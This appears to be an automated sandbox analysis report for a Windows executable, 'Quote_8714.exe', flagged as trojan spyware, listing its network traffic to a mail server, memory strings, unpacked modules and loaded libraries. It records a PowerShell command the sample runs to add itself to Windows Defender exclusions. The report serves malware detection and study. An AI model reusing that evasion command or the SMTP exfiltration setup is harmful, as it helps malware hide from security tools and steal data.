TCP traffic: 192.168.2.4:49735 -> 199.79.62.115:587

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: mail.mbarieservicesltd.com

Source: Quote_8714.exe, 00000005.00000002.2942693861.0000000002ADA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.mbarieservicesltd.com
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_0106DD14	0_2_0106DD14
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_04F276C8	0_2_04F276C8
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_04F20040	0_2_04F20040
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_04F2F543	0_2_04F2F543
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_04F2F53F	0_2_04F2F53F
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_04F276B8	0_2_04F276B8
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_04F25A52	0_2_04F25A52
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_04FFE190	0_2_04FFE190
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_07236E47	0_2_07236E47
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_0723A668	0_2_0723A668
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_0723BF60	0_2_0723BF60
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_07239DF8	0_2_07239DF8
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_0723C870	0_2_0723C870
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_0B260040	0_2_0B260040
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_0B267610	0_2_0B267610
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_0B260040	0_2_0B260040
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_0BCA58C0	0_2_0BCA58C0
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_0BCAD8B0	0_2_0BCAD8B0
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_0BCAD8B0	0_2_0BCAD8B0
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_0BCA86B8	0_2_0BCA86B8
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 0_2_0BCAE51F	0_2_0BCAE51F
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 5_2_00CA4140	5_2_00CA4140
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 5_2_00CACD4C	5_2_00CACD4C
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 5_2_00CA4D58	5_2_00CA4D58
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 5_2_00CADE40	5_2_00CADE40
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 5_2_00CA4488	5_2_00CA4488
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 5_2_06313900	5_2_06313900
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 5_2_06311728	5_2_06311728
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 5_2_0632DD20	5_2_0632DD20
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 5_2_06320040	5_2_06320040
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 5_2_0632E8F8	5_2_0632E8F8
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 5_2_063238E8	5_2_063238E8
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 5_2_0632BED0	5_2_0632BED0
Source: C:\Users\user\Desktop\Quote_8714.exe	Code function: 5_2_06324890	5_2_06324890

Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1756123538.00000000076D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1752690592.0000000005420000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameROItv.exe" vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000002.1745088291.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Quote_8714.exe
Source: Quote_8714.exe, 00000000.00000000.1691782225.00000000005F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameROItv.exe" vs Quote_8714.exe
Source: Quote_8714.exe, 00000005.00000002.2940203488.000000000042C000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs Quote_8714.exe
Source: Quote_8714.exe, 00000005.00000002.2940435451.00000000007F9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Quote_8714.exe
Source: Quote_8714.exe, 00000005.00000002.2941132727.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Quote_8714.exe
Source: Quote_8714.exe	Binary or memory string: OriginalFilenameROItv.exe" vs Quote_8714.exe

Source: Quote_8714.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Quote_8714.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, O.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, O.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, y8LkSCvYhQSRsrhllZ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, y8LkSCvYhQSRsrhllZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, y8LkSCvYhQSRsrhllZ.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, kx3wCBOTkFcMnULZwX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, kx3wCBOTkFcMnULZwX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, y8LkSCvYhQSRsrhllZ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, y8LkSCvYhQSRsrhllZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, y8LkSCvYhQSRsrhllZ.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/6@3/1

Source: C:\Users\user\Desktop\Quote_8714.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quote_8714.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Quote_8714.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ysu0wl3r.bhc.ps1

Jump to behavior

Source: Quote_8714.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Quote_8714.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Quote_8714.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Quote_8714.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Quote_8714.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quote_8714.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Quote_8714.exe	ReversingLabs: Detection: 36%
Source: Quote_8714.exe	Virustotal: Detection: 47%

Source: C:\Users\user\Desktop\Quote_8714.exe

File read: C:\Users\user\Desktop\Quote_8714.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Quote_8714.exe "C:\Users\user\Desktop\Quote_8714.exe"
Source: C:\Users\user\Desktop\Quote_8714.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\Quote_8714.exe	Process created: C:\Users\user\Desktop\Quote_8714.exe "C:\Users\user\Desktop\Quote_8714.exe"
Source: C:\Users\user\Desktop\Quote_8714.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process created: C:\Users\user\Desktop\Quote_8714.exe "C:\Users\user\Desktop\Quote_8714.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: wbemcomn.dll	Jump to behavior
